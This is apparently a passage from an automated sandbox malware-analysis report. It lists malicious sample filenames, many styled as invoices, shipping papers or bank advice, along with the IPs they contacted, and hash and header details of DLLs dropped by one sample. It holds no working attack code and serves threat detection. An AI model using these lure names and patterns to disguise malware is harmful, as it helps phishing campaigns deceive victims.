                                                                                                                                                                      e-dekont-20230120-.exeGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Win32.TrojanX-gen.777.12023.exeGet hashmaliciousBrowse
                                                                                                                                                                          XQDo1PTnRJ.exeGet hashmaliciousBrowse
                                                                                                                                                                            beF3Ek6Ual.exeGet hashmaliciousBrowse
                                                                                                                                                                              WA7urAQIa4.exeGet hashmaliciousBrowse
                                                                                                                                                                                QVtJKhCR8L.exeGet hashmaliciousBrowse
                                                                                                                                                                                  f0pl993Jlv.exeGet hashmaliciousBrowse
                                                                                                                                                                                    AhbLc42WlU.exeGet hashmaliciousBrowse
                                                                                                                                                                                      104.237.62.21102-06-2023 BKKS22087405.exeGet hashmaliciousBrowse
                                                                                                                                                                                        BTSL catalogue_2023_samples_list_revised.exeGet hashmaliciousBrowse
                                                                                                                                                                                          Curriculum Vitae CV Lic H&S Olivetti Renzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                            ACCOUNT_STATEMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                                              dekont-20230213.exeGet hashmaliciousBrowse
                                                                                                                                                                                                aust.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  whatsapp20231302.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                    Meidoh RFQ IND.2023.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      Order 45655454__GZip.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        Quotation Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          SWIFT COPY $47,000.00.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            Mt6zNRLiN7.exeGet hashmaliciousBrowse
                                                                                                                                                                                                              EbFCzrkHbh.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                Ref SF08866198 - Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  Payment Advice.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                    NEW INVOICE FOR OUR BULK ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      Debit Note.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        DHL Original Documents.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          DHL Original Documents.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                              canary.discord.comS3zoj9Uts0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                              uBZeAVcb6r.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                              12057ad2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                              build (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                                                                              Evo_Spoofer_V2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                                                                              qgMcnt4meR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                              04A31AE8A31BB4144D7392040442F4A38E8301CC55012.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                                                                              vrG0FGHo9i.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                              DsGo26G94d.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                              E3yRg4ob8v.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                              iBRa3vP0WB.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                              6ZA1oFKiR8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                              duEkTVseyk.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                              PMb1MdlBGB.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                              5fmulGfQ2b.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                              nUBTIa1WRr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                              Pw4sv8JMgF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                                                                              4G6DrDxQk5.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                                                                              oilQDAuiBH.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                              48aITmz4vp.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                              api4.ipify.org02-06-2023 BKKS22087405.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              VCqoktVVTW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              jYUiLz3l4X.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              FedEx Receipt_AWB# 102233516763.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              shipping documents.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              BTSL catalogue_2023_samples_list_revised.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              Curriculum Vitae CV Lic H&S Olivetti Renzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              Produkt nov#U00e9 objedn#U00e1vky.vbeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              TTRES2102023.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              ACCOUNT_STATEMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              dekont-20230213.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              e-dekont-20230213.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              DHL ORIGINAL DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              aust.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              PO. No. DM223778 IMG.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              130223.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              whatsapp20231302.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              New Order - ZKTECO.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              FEDEX INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                              WEBNXUS02-06-2023 BKKS22087405.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              VCqoktVVTW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              jYUiLz3l4X.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              FedEx Receipt_AWB# 102233516763.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              shipping documents.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              BTSL catalogue_2023_samples_list_revised.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              Curriculum Vitae CV Lic H&S Olivetti Renzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              Produkt nov#U00e9 objedn#U00e1vky.vbeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              TTRES2102023.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              ACCOUNT_STATEMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              dekont-20230213.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              e-dekont-20230213.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              DHL ORIGINAL DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              aust.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              PO. No. DM223778 IMG.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              130223.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              whatsapp20231302.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.237.62.211
                                                                                                                                                                                                                              New Order - ZKTECO.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 64.185.227.155
                                                                                                                                                                                                                              FEDEX INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 173.231.16.76
                                                                                                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              33040117281.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              https://banquea.ruGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              HSBC Payment Advice.com.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              Remmitance copy.shtml.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                                                              https://netorgft4757675-my.sharepoint.com/:o:/g/personal/nino_vervestaffing_com/EuVkRbAPDwZFrFzhzCB__pIBBRD_SZK6hPoC3ZhgkcgmFg?e=5%3adVoGdo&at=9Get hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                                                              https://aoowpeoworbnrriop.com/amazon-RD292-user-card-detail-em-thankGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              qi3aGh1Sg3.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              https://www.taskade.com:443/d/xJLXhpjd7Z2E8Xsq?share=view&view=dJ775zvXdngB6mXd&as=listGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              Ach-Copy-232323.HTMGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.16.123.96
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pydreaper.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                PonysGW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                  blackcap.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                    yeet.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pydreaper.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        PonysGW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                          blackcap.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                            yeet.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_Salsa20.pydreaper.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                PonysGW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                  blackcap.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                    yeet.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11264
                                                                                                                                                                                                                                                      Entropy (8bit):4.693594490869205
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:BZ9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDVM0OcX6gY/7ECFV:r9damqT3ThITst0E5DVKcqgY/79X
                                                                                                                                                                                                                                                      MD5:ABA0195EB33D86216170DCFF947DEBDB
                                                                                                                                                                                                                                                      SHA1:ACBE4DC26AD65DE51385CD95128491C64DEF9502
                                                                                                                                                                                                                                                      SHA-256:1F588A0D71C5378987FE05224493D85E93D02A52CE0B05809A06FC2BD489C325
                                                                                                                                                                                                                                                      SHA-512:8E4C7E02E55C7A64F81A2256A0B926A8CAD676571B6F822F7FDFDA5E4CC3EBF2A3EE45188BA2D2D639977CD4DCDBD737CA33DE7E838F3CD0B17C948AF6B65280
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: reaper.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: PonysGW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: blackcap.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: yeet.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...ba.c.........." ..."............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                                                      Entropy (8bit):5.048707283691193
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:HjNF/1nb2eqCQtkluknuz4ceS4QDuWA7cqgYvEP:D52P6luLtn4QDBmgYvEP
                                                                                                                                                                                                                                                      MD5:5B855B3E838D9C7FAAD4BD736CF56D59
                                                                                                                                                                                                                                                      SHA1:AD51237A6E2D1BEEFDDABFC8BD8AC0E205ED735F
                                                                                                                                                                                                                                                      SHA-256:7D1B252ADC643DEEB896430B58CF457436152351EB7FA043B4B24736C9EDF864
                                                                                                                                                                                                                                                      SHA-512:180207B3BD88976240ECCF39F2F174AF0D13FEEFD9B22B92363C0D947E8BD5B1523417A73D4B5AAF9252A59162E34E2F5DF76C837CBD1B458D1830F4D4C70918
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: reaper.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: PonysGW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: blackcap.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: yeet.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...ca.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.051714127100642
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:D22P6XTr0zXgWDbuQ0vdvZt49MgYvEMN:DN6XTragWDP9Jq
                                                                                                                                                                                                                                                      MD5:5298CA8A45BB3ADD1A03EC4CF8A46072
                                                                                                                                                                                                                                                      SHA1:CE7984FACB2DE472E247E4BBA042FEB406E1ABE1
                                                                                                                                                                                                                                                      SHA-256:D70795D5B6103AC1D81794D209085C573E4554A312CCD762CC5767AC98E5965C
                                                                                                                                                                                                                                                      SHA-512:B319464E07F3148F2079E22DB5B13CA08CCFE1986CD26A066B07147D6BF28E8B5D764C80AA22A33A5DFD7C9BC66FE39CBC4FC800E7FF6E13F0DE8856760A7242
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: reaper.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: PonysGW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: blackcap.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: yeet.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...ca.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12800
                                                                                                                                                                                                                                                      Entropy (8bit):5.103885048328888
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:2YoF1siKeai1dqmJo0qVVLf/+NJSC6sc9kJ9oPobXXXP4IIYOxDml8jcX6gRth2h:MsiHfq5poUkJ97zIDmlucqgRvE
                                                                                                                                                                                                                                                      MD5:68FD499C14CDDA49C5460E377410C30E
                                                                                                                                                                                                                                                      SHA1:16CD9C10C564F4FB16CEEE33DA21BD4D4EB367B9
                                                                                                                                                                                                                                                      SHA-256:48958204C0CC8412758C33FB4A970C87A83BE5A8A889959FE8831793D8102E06
                                                                                                                                                                                                                                                      SHA-512:A9B529560ABDEF38110A2147EF3E7924EA43A75D946D95CEB745015B690811AA2509F387D7868F1C9C6BE526E2E32A764FE84C062CAD315FEEE344F38D9819F9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............h...h...h......h..i...h..i...h...i...h..m...h..l...h..k...h...`...h...h...h.......h...j...h.Rich..h.........PE..d...aa.c.........." ..."............P.....................................................`.........................................P8..p....8..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36352
                                                                                                                                                                                                                                                      Entropy (8bit):6.554132422005377
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:Wf+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuxLg4HPy:uqWB7YJlmLJ3oD/S4j990th9VxsC
                                                                                                                                                                                                                                                      MD5:3BD3AF4C84932CD1AB5A8084040A76F6
                                                                                                                                                                                                                                                      SHA1:FD0429540688A8B2F6812C6347946910C6E8765D
                                                                                                                                                                                                                                                      SHA-256:437E89FD3DD47F5DEB6165F4F2A7F228CD415FB7F3D5DF5C1CB16A90044008CE
                                                                                                                                                                                                                                                      SHA-512:01DC0DDD1859E67A3C7B6EA92121CF1DBC2B8E440F9ECC5F182CAAC576FEEA57637D8437314058BCE7DE65DD2BFF70411A667CAA042FA51F8630B641E33E9C81
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...^a.c.........." ...".H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15360
                                                                                                                                                                                                                                                      Entropy (8bit):5.236024148269018
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:bURwiJsmXl02v8Y1uGniDOYtn3gwYUMvE:Owi6IOO1uGiDJtQwYU
                                                                                                                                                                                                                                                      MD5:0BA521EBCF0851B1283DC25766490460
                                                                                                                                                                                                                                                      SHA1:84C7F4E5CDA3F41461E95A11C35F438C10961EFC
                                                                                                                                                                                                                                                      SHA-256:782CB833FA04DAFA51BF1CB8CC811D71C9C6598208EED046EF5D8294E3651818
                                                                                                                                                                                                                                                      SHA-512:E02760F673BCBFEAAB3AAD86AD355070F80E573A68FBCE4DEB46AB5873A80D0B8B6744753F44437220E85D4D8E8D65D214780BF4EF5883AC92D05ECBCFD6DA96
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........eX.o...o...o.......o.......o.......o...o...o.......o.......o.......o.......o.......o.......o.......o..Rich.o..........................PE..d...^a.c.........." ..."..... ......P.....................................................`..........................................9......d:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...(....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                      Entropy (8bit):5.563552079767176
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:HJDd9Vk3yQ5f8vjVKChhXoJDkq6NS7oE2DDmlWw2XpmdcqgwNeecBU8:jk/5cj4shXED+o2Df8zgwNeO8
                                                                                                                                                                                                                                                      MD5:75A2D9A48DF773694E82534635BE7B9C
                                                                                                                                                                                                                                                      SHA1:4DC026B68CF697E8C5803775A5A9DAD656F8B247
                                                                                                                                                                                                                                                      SHA-256:B8D36C0ED8C994ED11F36B2ABC7D3C5116C215719BDC19C9596BB9E3FB811A4B
                                                                                                                                                                                                                                                      SHA-512:6221071EE7D441FFD83229B106B448DEF0E59354F17B16048D5C169583312ADE5534175F6D8A02C0827D68682C4343C27E3F002E5FC126C5F2300E0EC00EE18C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d..._a.c.........." ..."."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20992
                                                                                                                                                                                                                                                      Entropy (8bit):6.0599723099798455
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:BU/5cJMOZA0nmwBD+XpJgLa0Mp8QAg4P2llyM:uK1XBD+DgLa1FTi
                                                                                                                                                                                                                                                      MD5:AAF446AAF23C92FAD7D41B82DAA6F03C
                                                                                                                                                                                                                                                      SHA1:61914BE2ABDE68D24919E5F9124256EFB3A35B97
                                                                                                                                                                                                                                                      SHA-256:0432E9CF535C5C50DFA6776777BA89A2076BBF2DC6DB0EFA6C84483F501B00E3
                                                                                                                                                                                                                                                      SHA-512:B95E6FA8B5CAF3085EED7E654B52AB2C734C9976223F0F8F8801CE98DD2531A4019B9879FFD468130BFBBED931B26C9148F3A9B91C8F4353B3492280E693BED4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
